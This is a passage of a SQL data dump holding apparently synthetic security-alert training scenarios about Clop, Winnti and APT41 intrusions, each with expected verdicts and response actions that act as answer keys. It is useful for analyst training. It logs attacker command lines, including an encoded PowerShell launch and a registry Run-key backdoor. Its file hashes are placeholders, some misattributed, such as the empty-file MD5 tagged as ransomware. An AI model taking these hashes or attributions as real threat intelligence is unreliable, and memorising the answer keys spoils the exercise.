activity.\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"protocol\":\"HTTP\",\"data_size\":\"2GB\"}', '2026-02-01 13:58:57', '2026-02-16 17:48:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.83.214.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Clop ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a Clop ransomware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file integrity monitoring\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of exfiltrated sensitive 
data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. 
Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. 
Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.846Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T09:45:23Z\\\",\\\"event_id\\\":\\\"dlp-00432\\\",\\\"source_ip\\\":\\\"10.1.1.15\\\",\\\"destination_ip\\\":\\\"185.83.214.42\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_description\\\":\\\"Data exfiltration detected. Suspected Clop ransomware activity.\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"data_size\\\":\\\"2GB\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1126, 'Suspicious Network Activity Detected', 'medium', 'IDS/IPS Logs', 'Initial access attempt detected from a suspicious IP address, potentially linked to the Winnti Group, exploiting a vulnerability in the game distributor network. The traffic mimics legitimate game distribution traffic to avoid detection.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:45:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"http_method\":\"GET\",\"url\":\"/dist/gameupdate\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"signature_id\":\"2023456\",\"signature_info\":\"Exploitation of vulnerability in game distribution\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"gameupdate.exe\"}', '2026-02-01 14:01:26', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with Winnti Group activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server IP within gaming company\'s network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT41\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"gameupdate.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename used in past attacks on game distributors\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"http_method\\\":\\\"GET\\\",\\\"url\\\":\\\"/dist/gameupdate\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"signature_id\\\":\\\"2023456\\\",\\\"signature_info\\\":\\\"Exploitation of vulnerability in game 
distribution\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"gameupdate.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1127, 'Malicious Code Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, attackers execute a payload designed to infiltrate the core systems of the gaming network, leveraging stolen code-signing certificates for legitimacy.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"EDR-20231012-003\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"executed_command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start C:\\\\Temp\\\\malicious_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"compromised_user\",\"filename\":\"malicious_payload.exe\",\"process_id\":5678,\"code_signature\":{\"status\":\"Valid\",\"issuer\":\"Stolen Certificate Authority\"}}', '2026-02-01 14:01:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT41 toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File associated with recent APT41 attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory 
Logs\",\"verdict\":\"suspicious\",\"details\":\"User account recently used to execute unauthorized actions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1128, 'Establishing Persistence - Winnti Group', 'high', 'System Logs and Registry Changes', 'The Winnti Group has deployed advanced rootkits and backdoors on the compromised host, ensuring continued access to the network even after system reboots and security patches. The presence of a suspicious registry key and a known malicious file hash indicates persistence mechanisms have been established.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:35:00Z\",\"host_ip\":\"10.0.0.200\",\"registry_change\":{\"key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\WinntiBackdoor\",\"old_value\":null,\"new_value\":\"C:\\\\Windows\\\\System32\\\\winniti.exe\"},\"file_hash_detection\":{\"file_path\":\"C:\\\\Windows\\\\System32\\\\winniti.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"external_ip\":\"203.0.113.45\",\"username\":\"compromised_user\"}', '2026-02-01 14:01:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with the Winnti Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Winnti malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Username used during the 
incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.850Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:35:00Z\\\",\\\"host_ip\\\":\\\"10.0.0.200\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\WinntiBackdoor\\\",\\\"old_value\\\":null,\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\"},\\\"file_hash_detection\\\":{\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winniti.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1129, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'An intermediate-level lateral movement was detected within the network. The attackers are leveraging existing trust relationships and are targeting servers associated with game development and distribution. This activity aligns with APT41\'s known tactics and techniques.', 'Lateral Movement', 'T1078.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"10.0.2.20\",\"dst_port\":\"445\",\"protocol\":\"SMB\",\"username\":\"dev_user\",\"file_accessed\":\"game_assets_v2.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"203.0.113.45\",\"comment\":\"Suspicious SMB traffic detected from internal IP to game development server.\"}', '2026-02-01 14:01:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Targeted game development server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT41 malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to previous APT41 operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1130, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'In a sophisticated data exfiltration attempt, attackers are trying to transfer sensitive data, including source code and user information, to an external server. The operation is attributed to APT41, known for using supply chain attacks and espionage techniques.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:45:27Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\",\"action\":\"blocked\",\"message\":\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\",\"threat_actor\":\"APT41\"}', '2026-02-01 14:01:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash related to exfiltration tools used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file involved in the exfiltration 
attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 